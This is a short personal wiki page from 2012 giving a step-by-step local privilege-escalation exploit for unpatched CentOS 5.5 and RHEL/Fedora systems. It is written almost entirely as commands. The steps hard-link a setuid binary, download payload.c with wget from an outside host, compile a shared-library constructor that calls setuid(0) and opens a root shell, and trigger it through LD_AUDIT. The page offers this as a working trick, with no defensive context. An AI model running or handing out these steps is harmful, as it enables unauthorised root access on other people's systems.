Privilege escalation techniques

From Notes_Wiki
Revision as of 00:01, 24 November 2012 by Saurabh (talk | contribs) (Created page with "=Privilege escalation techniques= ==Trick 1== This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after Oc...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Privilege escalation techniques

Trick 1

This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after October 2010 seem to be safe against this attack. This also works on Fedora / RHEL type of distributions.

  1. mkdir /tmp/exploit
  2. ln /bin/ping /tmp/exploit/target
  3. exec 3< /tmp/exploit/target
  4. rm -rf /tmp/exploit/
  5. wget pistol.clan.su/payload.c
  6. The payload.c file contains
    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
  7. gcc -w -fPIC -shared -o /tmp/exploit payload.c
  8. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3